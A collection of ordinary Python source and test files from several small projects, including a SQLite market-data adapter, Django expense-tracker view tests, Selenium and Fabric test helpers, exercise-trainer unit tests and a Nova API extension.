finally:
if conn is not None:
conn.close()
@classmethod
def connect(cls, conn_string):
if not os.path.isfile(conn_string):
raise data_adapter.DatabaseNotFoundError
return cls(conn_string)
def __init__(self, conn_string):
self.conn_string = conn_string
self._conn = sqlite3.connect(self.conn_string,
detect_types=sqlite3.PARSE_DECLTYPES)
self._conn.execute('PRAGMA foreign_keys = ON')
# TODO(steve): should this be a decorator???
def _check_is_valid_security(self, security):
tickers = self.get_securities_list()
if security not in tickers:
raise InvalidTickerError(security)
def _get_security_id(self, security):
with self._conn:
sql = "SELECT id FROM securities WHERE ticker = ?"
cursor = self._conn.cursor()
cursor.execute(sql, (security,))
ticker_id = cursor.fetchone()[0]
return ticker_id
def close(self):
if self._conn is not None:
self._conn.close()
def get_securities_list(self):
with self._conn:
cursor = self._conn.cursor()
cursor.execute('SELECT ticker FROM securities')
rows = cursor.fetchall()
return [row[0] for row in rows]
def insert_securities(self, securities_to_add):
sql = 'INSERT INTO securities(ticker) VALUES(?)'
with self._conn:
cursor = self._conn.cursor()
for security in securities_to_add:
try:
cursor.execute(sql, (security,))
except sqlite3.IntegrityError:
pass
def update_market_data(self, security, equity_data):
self._check_is_valid_security(security)
ticker_id = self._get_security_id(security)
date, data = equity_data[0], equity_data[1]
with self._conn:
sql = """REPLACE INTO equity_prices(ticker_id, date, open,
high, low, close, adj_close, volume)
VALUES (?, ?, ?, ?, ?, ?, ?, ?)"""
cursor = self._conn.cursor()
cursor.execute(sql, (ticker_id, date, data.open, data.high,
data.low, data.close, data.adj_close,
data.volume))
def bulk_update_market_data(self, security, equity_data):
self._check_is_valid_security(security)
ticker_id = self._get_security_id(security)
# TODO(steve): find a more efficient way to update the database
# instead of updating rows one by one
with self._conn:
for d in equity_data:
date, data = d[0], d[1]
sql = """REPLACE INTO equity_prices(ticker_id, date, open,
high, low, close, adj_close, volume)
VALUES (?, ?, ?, ?, ?, ?, ?, ?)"""
cursor = self._conn.cursor()
cursor.execute(sql, (ticker_id, date, data.open, data.high,
data.low, data.close, data.adj_close,
data.volume))
def _get_equity_data(self, ticker_id, date):
with self._conn:
sql = """SELECT open, high, low, close, adj_close, volume
FROM equity_prices WHERE (ticker_id = ? and
date = ?)"""
cursor = self._conn.cursor()
cursor.execute(sql, (ticker_id, date))
rows = cursor.fetchall()
return rows
def get_equity_data(self, security, date):
self._check_is_valid_security(security)
ticker_id = self._get_security_id(security)
rows = self._get_equity_data(ticker_id, date)
if len(rows) == 0:
raise InvalidDateError(date)
elif len(rows) == 1:
data = EquityData(*rows[0])
return data
def get_equity_data_series(self, security):
self._check_is_valid_security(security)
ticker_id = self._get_security_id(security)
with self._conn:
sql = """SELECT date, open, high, low, close, adj_close, volume
FROM equity_prices WHERE (ticker_id = ?)"""
cursor = self._conn.cursor()
cursor.execute(sql, (ticker_id,))
rows = cursor.fetchall()
data = [(row[0], EquityData(*row[1:])) for row in rows]
return sorted(data, reverse=True)
```
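A round-trip sketch for the SQLite adapter; the filename and price figures are invented, and the `EquityData` field order is assumed to match the column order used in the SQL above (open, high, low, close, adj_close, volume):
```python
import datetime
from market_data.data import EquityData
from market_data.sqlite3_data_adapter import Sqlite3DataAdapter

Sqlite3DataAdapter.create_database('example.db')
conn = Sqlite3DataAdapter.connect('example.db')
conn.insert_securities(['AMZN'])
row = EquityData('1793.03', '1804.90', '1745.23', '1749.62', '1749.62', '5270800')
conn.update_market_data('AMZN', (datetime.datetime(2019, 8, 23), row))
print(conn.get_equity_data('AMZN', datetime.datetime(2019, 8, 23)))
conn.close()
```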
#### File: market_data/tests/cli_functional_tests.py
```python
import os
import sys
import inspect
file_path = os.path.dirname(inspect.getfile(inspect.currentframe()))
sys.path.insert(0, os.path.split(os.path.split(file_path)[0])[0])
import unittest
from unittest.mock import patch
import datetime
from parameterized import parameterized_class
from freezegun import freeze_time
import cli as app
from cli import Messages as msg
import market_data.data_adapter as data_adapter
import market_data.tests.utils as test_utils
@parameterized_class(('data_adapter_source', ),[
[data_adapter.DataAdapterSource.JSON, ],
[data_adapter.DataAdapterSource.SQLITE3, ]
])
class CommandLineInterfaceTests(unittest.TestCase):
def setUp(self):
self.da = data_adapter.get_adapter(self.data_adapter_source)
self.database = self.da.test_database
app.DATA_ADAPTER_SOURCE = self.data_adapter_source
self.actual_output = []
self.user_input = []
def mock_input(s):
self.actual_output.append(s)
return self.user_input.pop(0)
app.input = mock_input
app.print = lambda s: self.actual_output.append(s)
def tearDown(self):
try:
self.da.delete_test_database()
except:
pass
@freeze_time('2019-08-27')
@patch('market_data.scraper.Scraper.scrape_eq_multiple_dates',
autospec=True)
def test_update_security_for_multiple_dates(self, mock_scraper):
# Load test data
dataset = test_utils.load_test_data()
ticker = 'AMZN'
dt1 = datetime.datetime(2019, 8, 23)
expected_data_dt1 = test_utils.get_test_data(dataset, ticker, dt1)
dt2 = datetime.datetime(2019, 8, 26)
expected_data_dt2 = test_utils.get_test_data(dataset, ticker, dt2)
dt3 = datetime.datetime(2019, 8, 27)
expected_data_dt3 = test_utils.get_test_data(dataset, ticker, dt3)
data_series = [
(dt3, expected_data_dt3),
(dt2, expected_data_dt2),
(dt1, expected_data_dt1)
]
# Create an existing database with data already in the database
self.da.create_test_database()
data = self.da.connect(self.database)
data.insert_securities([ticker])
data.update_market_data(ticker, (dt1, expected_data_dt1))
data.close()
# Adam opens the app on an existing database.
sys.argv = ['./app.py', self.database]
expected_output = []
# He gets the standard main menu options to start
expected_output.append(msg.load_existing_database(self.database))
expected_output.append(msg.main_menu())
expected_output.append(msg.option_input())
# He updates the market data to get the latest data available
# The app will update all market data from the last available
# date to the current date
ret_value = [
(dt2.date(), expected_data_dt2),
(dt3.date(), expected_data_dt3)
]
mock_scraper.return_value = ret_value, []
self.user_input.append(app.MenuOptions.UPDATE_MARKET_DATA)
expected_output.append(msg.market_data_updated())
expected_output.append(msg.main_menu())
expected_output.append(msg.option_input())
# He then proceeds to view the updated market data
self.user_input.append(app.MenuOptions.VIEW_SECURITIES)
expected_output.append(msg.view_securities(['AMZN']))
expected_output.append(msg.option_input())
# He then chooses to see the updated market data in AMZN
self.user_input.append('1')
expected_output.append(msg.view_security_data(ticker, data_series))
expected_output.append(msg.any_key_to_return())
# Happy with the results he returns the view securities page
self.user_input.append('')
expected_output.append(msg.view_securities(['AMZN']))
expected_output.append(msg.option_input())
        # This time he chooses to go back to the main menu
# and quits the application
self.user_input.append('0')
expected_output.append(msg.main_menu())
expected_output.append(msg.option_input())
self.user_input.append(app.MenuOptions.QUIT)
expected_output.append(msg.quit())
# Method
app.main()
# Tests
for actual, expected in zip(self.actual_output, expected_output):
self.assertEqual(actual, expected)
self.assertEqual(len(self.actual_output), len(expected_output))
@freeze_time('2019-05-10')
@patch('market_data.scraper.Scraper.scrape_eq_multiple_dates',
autospec=True)
def test_update_and_view_updated_security(self, mock_scraper):
ticker, dt, expected_data = test_utils.get_expected_equity_data()
mock_scraper.return_value = [(dt.date(), expected_data)], []
# Mary on hearing from Alex about this new command line
# app decides to try it.
sys.argv = ['./app.py', self.database]
expected_output = []
# Upon opening the app she is presented with a bunch of options
expected_output.append(msg.new_database_created(self.database))
expected_output.append(msg.main_menu())
expected_output.append(msg.option_input())
# She selects to add a security and adds 'AMZN'
# The app then returns her to the main menu.
self.user_input.append(app.MenuOptions.ADD_SECURITIES)
expected_output.append(msg.add_security_input())
self.user_input.append('AMZN')
expected_output.append(msg.security_added('AMZN'))
expected_output.append(msg.main_menu())
expected_output.append(msg.option_input())
        # Since the US equities market is closed she decides
        # to update the market data which will update the
        # security she just added
self.user_input.append(app.MenuOptions.UPDATE_MARKET_DATA)
expected_output.append(msg.market_data_updated())
expected_output.append(msg.main_menu())
expected_output.append(msg.option_input())
# She then proceeds to view the updated market data
self.user_input.append(app.MenuOptions.VIEW_SECURITIES)
expected_output.append(msg.view_securities(['AMZN']))
expected_output.append(msg.option_input())
# She then chooses to see the updated market data in AMZN
self.user_input.append('1')
expected_output.append(msg.view_security_data(ticker,
[(dt, expected_data)]))
expected_output.append(msg.any_key_to_return())
# Happy with the results she returns the view securities page
self.user_input.append('')
expected_output.append(msg.view_securities(['AMZN']))
expected_output.append(msg.option_input())
# This time she selects to go back to the main menu
# and quits the application
self.user_input.append('0')
expected_output.append(msg.main_menu())
expected_output.append(msg.option_input())
self.user_input.append(app.MenuOptions.QUIT)
expected_output.append(msg.quit())
# Method
app.main()
# Tests
for actual, expected in zip(self.actual_output, expected_output):
self.assertEqual(actual, expected)
self.assertEqual(len(self.actual_output), len(expected_output))
def test_add_securities_and_view_securities(self):
expected_output = []
# Alex has heard about this new command line app that can
# store financial market data for him. He decides to open it
# NOTE(steve): simulates ./app.py call on command line
expected_output.append(msg.no_database_specified())
sys.argv = ['./app.py']
app.main()
# Upon opening it, he is told that he has not specified
# a database for the application to hook up to.
self.assertEqual(expected_output, self.actual_output)
# Reading through the help provided, Alex decides to give it another
# go and this time provides a database connection for the app to
# create a new database file
sys.argv = ['./app.py', self.database]
expected_output = []
self.actual_output = []
# Upon providing the database connection string he is able
# to move on to the next screen in the app.
expected_output.append(msg.new_database_created(self.database))
expected_output.append(msg.main_menu())
expected_output.append(msg.option_input())
# Curious to see if there are any securities in the app already
# he selects option 1 to view the securities.
self.user_input.append(app.MenuOptions.VIEW_SECURITIES)
expected_output.append(msg.view_securities([]))
expected_output.append(msg.option_input())
# As expected there are no securities so he returns to the main menu
# and proceeds to option 2 to add securities
self.user_input.append('0')
expected_output.append(msg.main_menu())
expected_output.append(msg.option_input())
self.user_input.append(app.MenuOptions.ADD_SECURITIES)
expected_output.append(msg.add_security_input())
# He adds AMZN to the database
self.user_input.append('AMZN')
expected_output.append(msg.security_added('AMZN'))
expected_output.append(msg.main_menu())
expected_output.append(msg.option_input())
# He now checks that the security has been added to the list
self.user_input.append(app.MenuOptions.VIEW_SECURITIES)
expected_output.append(msg.view_securities(['AMZN']))
expected_output.append(msg.option_input())
# Satisfied with the results he returns to the main menu
# and closes the application
self.user_input.append('0')
expected_output.append(msg.main_menu())
expected_output.append(msg.option_input())
self.user_input.append(app.MenuOptions.QUIT)
expected_output.append(msg.quit())
# Method
app.main()
# Tests
for actual, expected in zip(self.actual_output, expected_output):
self.assertEqual(actual, expected)
self.assertEqual(len(self.actual_output), len(expected_output))
if __name__ == '__main__':
unittest.main()
```
|
{
"source": "jeckt/mindful-spending",
"score": 3
}
|
#### File: core/tests/test_views.py
```python
from django.test import TestCase
from django.utils.html import escape
from core.models import Expense
from core.forms import (
ExpenseForm, EMPTY_DESCRIPTION_ERROR,
EMPTY_AMOUNT_ERROR, NEGATIVE_AMOUNT_ERROR
)
from datetime import date, timedelta
today = date.today()
today_display = today.strftime('%d-%b-%Y')
today_input = today.strftime('%Y-%m-%d')
def create_two_expense_objects():
Expense.objects.create(description='expense 1',
amount=5.25,
date=today
)
Expense.objects.create(description='expense 2',
amount=2.5,
date=today
)
# TODO(steve): should we name the app core or expenses?!?
class HomePageTest(TestCase):
def test_uses_home_template(self):
response = self.client.get('/')
self.assertTemplateUsed(response, 'home.html')
def test_home_page_uses_expense_form(self):
response = self.client.get('/')
self.assertIsInstance(response.context['form'], ExpenseForm)
def test_can_save_POST_request(self):
response = self.client.post('/expenses/new', data={
'description': 'new expense',
'amount': 6.5,
'date': today_input
})
self.assertRedirects(response, '/')
self.assertEqual(Expense.objects.count(), 1)
new_expense = Expense.objects.first()
self.assertEqual(new_expense.description, 'new expense')
self.assertEqual(new_expense.amount, 6.5)
def test_POST_redirects_to_home_page(self):
response = self.client.post('/expenses/new', data={
'description': 'new expense',
'amount': 6.5,
'date': today_input
})
self.assertRedirects(response, '/')
def test_expenses_displayed_on_home_page(self):
create_two_expense_objects()
response = self.client.get('/')
self.assertContains(response, 'expense 1')
self.assertContains(response, 'expense 2')
self.assertContains(response, '5.25')
self.assertContains(response, '2.5')
self.assertEqual(response.content.decode().count(today_display), 2)
def test_total_expenses_displayed_on_home_page(self):
create_two_expense_objects()
response = self.client.get('/')
self.assertContains(response, '7.75')
class ExpenseValidationViewTest(TestCase):
def post_expense_with_empty_description(self):
return self.client.post('/expenses/new', data={
'description': '',
'amount': 5.25,
'date': today_input
})
def test_invalid_input_doesnt_clear_previous_expenses(self):
create_two_expense_objects()
response = self.post_expense_with_empty_description()
self.assertContains(response, 'expense 1')
self.assertContains(response, 'expense 2')
self.assertContains(response, '5.25')
self.assertContains(response, '2.5')
self.assertEqual(response.content.decode().count(today_display), 2)
self.assertContains(response, '7.75') # total expenses
def test_for_invalid_input_passes_form_to_template(self):
response = self.post_expense_with_empty_description()
self.assertIsInstance(response.context['form'], ExpenseForm)
# TODO(steve): should we move this into separate test cases?!
def test_for_invalid_input_nothing_saved_to_db(self):
self.post_expense_with_empty_description()
self.assertEqual(Expense.objects.count(), 0)
self.client.post('/expenses/new', data={
'description': '',
'amount': ''
})
self.assertEqual(Expense.objects.count(), 0)
self.client.post('/expenses/new', data={
'description': 'No amount',
'amount': ''
})
self.assertEqual(Expense.objects.count(), 0)
self.client.post('/expenses/new', data={
'description': 'Negative amount',
'amount': -0.4
})
self.assertEqual(Expense.objects.count(), 0)
def test_empty_description_shows_errors(self):
response = self.post_expense_with_empty_description()
expected_error = escape(EMPTY_DESCRIPTION_ERROR)
self.assertContains(response, expected_error)
self.assertTemplateUsed(response, 'home.html')
def test_empty_amount_shows_errors(self):
response = self.client.post('/expenses/new', data={
'description': 'No amount',
'amount': ''
})
expected_error = escape(EMPTY_AMOUNT_ERROR)
self.assertContains(response, expected_error)
self.assertTemplateUsed(response, 'home.html')
def test_negative_amount_shows_errors(self):
response = self.client.post('/expenses/new', data={
'description': 'Negative amount',
'amount': -0.4
})
expected_error = escape(NEGATIVE_AMOUNT_ERROR)
self.assertContains(response, expected_error)
self.assertTemplateUsed(response, 'home.html')
class ExpenseDeletionTest(TestCase):
def test_can_delete_POST_request(self):
expense = Expense.objects.create()
self.assertEqual(Expense.objects.count(), 1)
self.client.post(f'/expenses/{expense.id}/delete')
self.assertEqual(Expense.objects.count(), 0)
def test_delete_removes_expenses_from_view(self):
expense = Expense.objects.create(description='expense 1',
amount=5.25,
date=today
)
        response = self.client.get('/expenses/edit')
self.assertContains(response, 'expense 1')
self.assertContains(response, '5.25')
self.assertContains(response, today_input)
self.client.post(f'/expenses/{expense.id}/delete')
response = self.client.get('/expenses/edit')
self.assertNotContains(response, 'expense 1')
self.assertNotContains(response, '5.25')
self.assertNotContains(response, today_input)
def test_delete_POST_redirects_to_edit_page(self):
expense = Expense.objects.create()
response = self.client.post(f'/expenses/{expense.id}/delete')
self.assertRedirects(response, '/expenses/edit')
class ExpenseEditViewTest(TestCase):
def test_uses_edit_template(self):
response = self.client.get('/expenses/edit')
self.assertTemplateUsed(response, 'edit.html')
def test_expenses_displayed_on_edit_page(self):
create_two_expense_objects()
response = self.client.get('/expenses/edit')
self.assertContains(response, 'expense 1')
self.assertContains(response, 'expense 2')
self.assertContains(response, '5.25')
self.assertContains(response, '2.5')
self.assertEqual(response.content.decode().count(today_input), 4)
def test_can_update_POST_request(self):
expense = Expense.objects.create(description='expense 1',
amount=5.25,
date=today
)
self.assertEqual(Expense.objects.count(), 1)
response = self.client.get('/expenses/edit')
self.assertContains(response, 'expense 1')
self.assertContains(response, '5.25')
self.assertContains(response, today_input)
new_date = (today + timedelta(days=1))
response = self.client.post(f'/expenses/edit/{expense.id}', data={
'description': 'expense 2',
'amount': '15.25',
'date': new_date.strftime('%Y-%m-%d')
})
response = self.client.get('/expenses/edit')
self.assertContains(response, 'expense 2')
self.assertContains(response, '15.25')
self.assertContains(response, new_date.strftime('%Y-%m-%d'))
def test_invalid_update_does_not_change_expense(self):
expense = Expense.objects.create(description='expense 1',
amount=5.25,
date=today
)
self.assertEqual(Expense.objects.count(), 1)
response = self.client.get('/expenses/edit')
self.assertContains(response, 'expense 1')
self.assertContains(response, '5.25')
self.assertContains(response, today_input)
response = self.client.post(f'/expenses/edit/{expense.id}', data={
'description': 'expense 1',
'amount': '5.25',
'date': today_input
})
response = self.client.get('/expenses/edit')
self.assertContains(response, 'expense 1')
self.assertContains(response, '5.25')
self.assertContains(response, today_input)
def test_valid_edit_POST_redirects_to_edit_page(self):
expense = Expense.objects.create()
response = self.client.post(f'/expenses/edit/{expense.id}', data={
'description': 'expense 1',
'amount': '5.25',
'date': today_input
})
self.assertRedirects(response, '/expenses/edit')
def test_invalid_edit_POST_redirects_to_edit_page(self):
expense = Expense.objects.create()
response = self.client.post(f'/expenses/edit/{expense.id}', data={
'description': 'expense 1',
'amount': '-0.40',
'date': today_input
})
self.assertRedirects(response, '/expenses/edit')
# NOTE(steve): we also need to test that the invalid edits show
# error messages
```
#### File: mindful-spending/functional_tests/base.py
```python
from django.contrib.staticfiles.testing import StaticLiveServerTestCase
from selenium.common.exceptions import WebDriverException
from selenium import webdriver
import os
import time
from datetime import date
MAX_WAIT = 20
def wait(fn):
def modified_fn(*args, **kwargs):
start_time = time.time()
while True:
try:
return fn(*args, **kwargs)
except (AssertionError, WebDriverException) as e:
if time.time() - start_time > MAX_WAIT:
raise e
time.sleep(0.5)
return modified_fn
class FunctionalTest(StaticLiveServerTestCase):
def setUp(self):
self.browser = webdriver.Firefox()
self.staging_server = os.environ.get('STAGING_SERVER')
if self.staging_server:
from .server_tools import reset_database
self.live_server_url = 'http://' + self.staging_server
reset_database(self.staging_server)
def tearDown(self):
self.browser.quit()
super().tearDown()
@wait
def wait_for(self, fn):
return fn()
```
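A hypothetical helper showing how `@wait` is meant to be used: the wrapped assertion is retried every 0.5 seconds and the error is only re-raised after `MAX_WAIT` seconds:
```python
@wait
def assert_header_shown(browser, text):
    # Retried until it passes or MAX_WAIT seconds elapse
    assert text in browser.find_element_by_tag_name('h1').text
```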
#### File: mindful-spending/functional_tests/server_tools.py
```python
from fabric.api import run
from fabric.context_managers import settings
def _get_manage_dot_py(host):
return f'~/sites/{host}/virtualenv/bin/python ~/sites/{host}/manage.py'
def reset_database(host):
manage_dot_py = _get_manage_dot_py(host)
with settings(host_string=f'steve@{host}'):
run(f'{manage_dot_py} flush --noinput')
```
|
{
"source": "jeckt/trainer",
"score": 3
}
|
#### File: trainer/tests/test_trainer.py
```python
import sys
import os
import filecmp
sys.path.insert(0, os.path.abspath('../trainer'))
sys.path.insert(0, os.path.abspath('./trainer'))
import unittest
import shutil
from trainer import Trainer
from exercises import Exercises, Exercise
DATA_PATH = os.path.dirname(__file__)
TEST_DATA_FILE = os.path.join(DATA_PATH, 'test_dataset_1.pkl')
TEST_ADD_DATA = os.path.join(DATA_PATH, 'new_exercises.csv')
TEST_OUT_FILE = os.path.join(DATA_PATH, 'test_dataset_1.csv')
TEST_OUT_FILE_COPY = os.path.join(DATA_PATH, 'test_dataset_1_copy.csv')
class TrainerConnectionTestCases(unittest.TestCase):
"""A set of unit test for testing connection"""
def test_test_data_loaded(self):
trainer = Trainer(conn=TEST_DATA_FILE)
self.assertTrue(trainer._is_data_loaded,
"Trainer could not load test data")
def test_data_does_not_exist(self):
with self.assertRaises(IOError) as context:
trainer = Trainer(conn='fail_data')
        self.assertTrue('Could not connect to data' in str(context.exception))
def test_data_loaded(self):
trainer = Trainer()
self.assertTrue(trainer._is_data_loaded,
"Trainer could not load test data")
# TODO(steve): should test cases be refactored?
# Moving test cases into smaller test suites may make
# it easier to identify errors.
class TrainerTestCases1(unittest.TestCase):
"""A set of unit tests for the trainer class"""
def setUp(self):
# NOTE(steve): the performance impact
# of copying a data for each test will
# be an issue with larger test data sets
self._TMP_DATA_FILE = "_tmp_data.pkl"
i = 0
while os.path.isfile(self._TMP_DATA_FILE):
self._TMP_DATA_FILE = "_tmp_data_{}.pkl".format(i)
i += 1
shutil.copyfile(TEST_DATA_FILE, self._TMP_DATA_FILE)
self.trainer = Trainer(conn=self._TMP_DATA_FILE)
def tearDown(self):
if os.path.isfile(self._TMP_DATA_FILE):
os.remove(self._TMP_DATA_FILE)
if os.path.isfile(TEST_OUT_FILE_COPY):
os.remove(TEST_OUT_FILE_COPY)
def test_trainer_output_exercises_to_csv(self):
self.trainer.output_exercises_to_csv(TEST_OUT_FILE_COPY)
self.assertTrue(filecmp.cmp(TEST_OUT_FILE, TEST_OUT_FILE_COPY))
def test_trainer_bulk_add_exercises_from_csv(self):
tasks = self.trainer.get_all_exercises()
self.assertEqual(len(tasks), 10)
self.trainer.add_exercises_from_csv(TEST_ADD_DATA)
new_tasks = self.trainer.get_all_exercises()
self.assertEqual(len(new_tasks), 13)
def test_trainer_bulk_add_exercises_from_csv_no_file(self):
with self.assertRaises(IOError) as context:
self.trainer.add_exercises_from_csv('fake.csv')
error_msg = "no such file or directory: '{}'".format('fake.csv')
        self.assertTrue(error_msg in str(context.exception))
def test_trainer_update_exercise(self):
all_tasks = self.trainer.get_all_exercises()
ex = all_tasks[2]
new_ex = Exercise("Fake update on exercise")
self.trainer.update_exercise(ex, new_ex)
new_all_tasks = self.trainer.get_all_exercises()
self.assertTrue(new_ex in new_all_tasks)
self.assertTrue(ex not in new_all_tasks)
def test_trainer_update_non_existent_exercise(self):
old_ex = Exercise("not in set")
new_ex = Exercise("it won't work dude")
with self.assertRaises(ValueError) as context:
self.trainer.update_exercise(old_ex, new_ex)
error_msg = "{} not in exercises".format(old_ex)
        self.assertTrue(error_msg in str(context.exception))
def test_trainer_update_persists_to_data_storage(self):
all_tasks = self.trainer.get_all_exercises()
ex = all_tasks[2]
new_ex = Exercise("Fake update on exercise")
self.assertTrue(new_ex not in all_tasks)
self.assertTrue(ex in all_tasks)
self.trainer.update_exercise(ex, new_ex)
new_trainer = Trainer(conn=self._TMP_DATA_FILE)
new_all_tasks = new_trainer.get_all_exercises()
self.assertTrue(new_ex in new_all_tasks)
self.assertTrue(ex not in new_all_tasks)
def test_trainer_returns_exercises_of_type_exercise(self):
tasks = self.trainer.get_all_exercises()
ex = tasks[0]
self.assertIsInstance(ex, Exercise)
def test_trainer_exercises_of_type_exercises(self):
self.assertIsInstance(self.trainer._exercises, Exercises)
def test_get_all_exercises(self):
        tasks = self.trainer.get_all_exercises()
self.assertEqual(len(tasks), 10)
def test_get_new_list_of_exercises(self):
tasks = self.trainer.get_new_list(5)
self.assertEqual(len(tasks), 5)
def test_not_enough_exercises_to_generate_new_list(self):
with self.assertRaises(Exception) as context:
tasks = self.trainer.get_new_list(15)
error_msg = "15 exercises requested but only 10 available"
        self.assertTrue(error_msg in str(context.exception))
def test_get_new_list_does_not_change_all_exercises(self):
all_tasks = self.trainer.get_all_exercises()
self.assertEqual(len(all_tasks), 10)
tasks = self.trainer.get_new_list(7)
new_all_tasks = self.trainer.get_all_exercises()
self.assertEqual(len(new_all_tasks), 10)
# it is safe to assume that we have a unique set of
# programming exercises
self.assertTrue(all_tasks == new_all_tasks,
"List of all tasks has been mutated!")
def test_add_new_exercise(self):
all_tasks = self.trainer.get_all_exercises()
self.assertEqual(len(all_tasks), 10)
exercise = Exercise("new random exercise")
self.trainer.add_exercise(exercise)
new_all_tasks = self.trainer.get_all_exercises()
self.assertEqual(len(new_all_tasks), 11)
self.assertIn(exercise, new_all_tasks)
def test_add_duplicate_exercise(self):
all_tasks = self.trainer.get_all_exercises()
exercise = all_tasks[4]
with self.assertRaises(Exception) as context:
self.trainer.add_exercise(exercise)
error_msg = "Exercise already exists. Exercise: {}".format(exercise)
        self.assertTrue(error_msg in str(context.exception))
def test_add_new_exercise_persists_to_data_storage(self):
exercise = Exercise("new random exercise")
self.trainer.add_exercise(exercise)
old_all_tasks = self.trainer.get_all_exercises()
new_trainer = Trainer(conn=self.trainer._conn)
new_all_tasks = new_trainer.get_all_exercises()
# NOTE(steve): may be slow when data set size increases
self.assertTrue(old_all_tasks == new_all_tasks,
"Changes aren't persisting to data storage")
def test_get_all_exercises_returns_a_copy_only(self):
all_tasks = self.trainer.get_all_exercises()
self.assertEqual(len(all_tasks), 10)
ex = Exercise('exercise should not be included')
all_tasks.append(ex)
new_all_tasks = self.trainer.get_all_exercises()
self.assertEqual(len(new_all_tasks), 10)
def test_remove_existing_exercise(self):
old_all_tasks = self.trainer.get_all_exercises()
self.assertEqual(len(old_all_tasks), 10)
exercise = old_all_tasks[2]
self.trainer.remove_exercise(exercise)
new_all_tasks = self.trainer.get_all_exercises()
self.assertEqual(len(new_all_tasks), 9)
def test_remove_exercise_not_in_trainer(self):
exercise = "non existent exercise"
with self.assertRaises(Exception) as context:
self.trainer.remove_exercise(exercise)
error_msg = "Exercise does not exist. "
error_msg += "Cannot remove exercise. "
error_msg += "Exercise: {}""".format(exercise)
self.assertTrue(error_msg in context.exception)
def test_remove_exercise_persists_to_data_storage(self):
old_all_tasks = self.trainer.get_all_exercises()
exercise = old_all_tasks[3]
self.trainer.remove_exercise(exercise)
updated_all_tasks = self.trainer.get_all_exercises()
new_trainer = Trainer(conn=self.trainer._conn)
new_all_tasks = new_trainer.get_all_exercises()
# NOTE(steve): may be slow when data set size increases
self.assertTrue(updated_all_tasks == new_all_tasks,
"Changes aren't persisting to data storage")
if __name__ == '__main__':
unittest.main()
```
|
{
"source": "jeckxie/gxzw-nova",
"score": 2
}
|
#### File: openstack/compute/wstvms.py
```python
from oslo_log import log as logging
from nova.api.openstack import extensions
from nova.api.openstack import wsgi
from nova.policies import wstvms as al_policies
from ics_sdk import session as ics_session
LOG = logging.getLogger(__name__)
ALIAS = "wstvms"
class WstvmsController(wsgi.Controller):
"""The Wstvms API controller for the OpenStack API."""
def __init__(self):
self.ics_manager = ics_session.get_session()
super(WstvmsController, self).__init__()
@extensions.expected_errors(404)
def wstvmsmessage(self, req, id):
#ics_vms = self.ics_manager.vm.get_vms_in_host(id)
        LOG.debug("Fetching ICS VM info for %s", id)
return self.ics_manager.vm.get_info(id)
class Wstvms(extensions.V21APIExtensionBase):
"""Admin-only cluster administration."""
name = "Wstvms"
alias = ALIAS
version = 1
def get_resources(self):
m_actions = {'wstvmsmessage': 'GET'}
resources = [extensions.ResourceExtension(ALIAS, WstvmsController(),
member_actions=m_actions)]
return resources
def get_controller_extensions(self):
return []
```
|
{
"source": "jecky100000/Tong-Music",
"score": 2
}
|
#### File: jecky100000/Tong-Music/rhyme_searching.py
```python
from xpinyin import Pinyin
rhyme_list = [
['a','ba','ca','cha','da','fa','ga','gua','ha','hua','jia','ka','kua','la','lia','ma','na','pa','qia','sa','sha','shua','ta','wa','xia','ya','za','zha','zhua'],
['ai','bai','cai','chai','dai','gai','guai','hai','huai','kai','kuai','lai','mai','nai','pai','sai','shai','shuai','tai','wai','zai','zhai'],
['an','ban','can','chan','chuan','cuan','dan','duan','fan','gan','guan','han','huan','kan','kuan','lan','luan','man','nan','nuan','pan','ran','ruan','san','shan','shuan','suan','tan','tuan','wan','zan','zhan','zhuan','zuan'],
['ang','bang','cang','chang','chuang','dang','fang','gang','guang','hang','huang','jiang','kang','kuang','lang','liang','mang','nang','niang','pang','qiang','rang','sang','shang','shuang','tang','wang','xiang','yang','zang','zhang','zhuang'],
['ao','bao','biao','cao','chao','dao','diao','gao','hao','jiao','kao','lao','liao','mao','miao','nao','niao','pao','piao','qiao','rao','sao','shao','tao','tiao','xiao','yao','zao','zhao'],
['bei','cui','chui','dei','dui','ei','fei','gei','gui','hei','hui','kui','lei','mei','nei','pei','rui','shui','sui','tui','wei','zei','zhui','zui'],
['ben','cen','ceng','chen','cheng','chun','cun','dun','en','fen','gen','gun','hen','heng','hun','jun','ken','keng','kun','lun','men','nen','neng','pen','ren','reng','run','sen','seng','shen','sheng','shun','sun','teng','tun','wen','zen','zeng','zhen','zheng','zhun','zun'],
['beng','chong','cong','deng','dong','eng','feng','geng','gong','hong','jiong','kong','leng','long','meng','nong','peng','qiong','rong','song','tong','weng','xiong','yong','zhong','zong'],
['bi','di','ji','ju','li','lv','mi','ni','nv','pi','qi','qu','ti','xi','xu','yi','yu'],
['bian','dian','jian','juan','lian','mian','nian','pian','qian','quan','tian','xian','xuan','yan','yuan'],
['bie','die','jie','jue','lie','lve','mie','nie','nve','pie','qie','que','tie','xie','xue','ye','yue'],
['bin','bing','ding','jin','jing','lin','ling','min','ming','nin','ning','pin','ping','qin','qing','qun','ting','xin','xing','xun','yin','ying','yun'],
['bo','chou','chou','cou','cuo','diu','dou','duo','fo','fou','gou','guo','hou','huo','jiu','kou','kuo','liu','lou','luo','miu','mo','mou','niu','nou','nuo','o','ou','po','pou','qiu','rou','ruo','shou','shuo','sou','suo','tou','tuo','wo','xiu','you','zhou','zhuo','zou','zuo'],
['bu','chu','cu','du','fu','gu','hu','ku','lu','mu','nu','pu','ru','shu','su','tu','wu','zhu','zu'],
['ce','che','de','e','er','ge','he','ke','le','me','ne','re','se','she','te','ze','zhe'],
['chi','ci','ri','shi','si','zhi','zi']
]
def rhyme(line):
test = Pinyin()
b=str(test.get_pinyin(line[-1]))
number = 0
for rhymes in range(len(rhyme_list)):
if b in rhyme_list[rhymes]:
number = rhymes + 1
break
number /= len(rhyme_list)
# print(number)
return number
```
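A minimal usage sketch of `rhyme` (hedged: it assumes `xpinyin` is installed and that the module above is importable as `rhyme_searching`; the sample lines are illustrative only). The function takes the pinyin of a line's final character and returns its rhyme-group index normalized by the 16 groups, or 0.0 if no group matches.
```python
# Hypothetical usage of rhyme() from rhyme_searching.py above.
from rhyme_searching import rhyme

# '鹿' -> pinyin 'lu', found in group 14 of 16 -> returns 14/16 = 0.875
print(rhyme('飞雪连天射白鹿'))
# '鸳' -> pinyin 'yuan', found in group 10 of 16 -> returns 10/16 = 0.625
print(rhyme('笑书神侠倚碧鸳'))
```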
|
{
"source": "jeclrsg/HPCC-Platform",
"score": 2
}
|
#### File: esp/esdlcmd/esdlcmd-test.py
```python
__version__ = "0.1"
import argparse
import filecmp
import inspect
import logging
import os
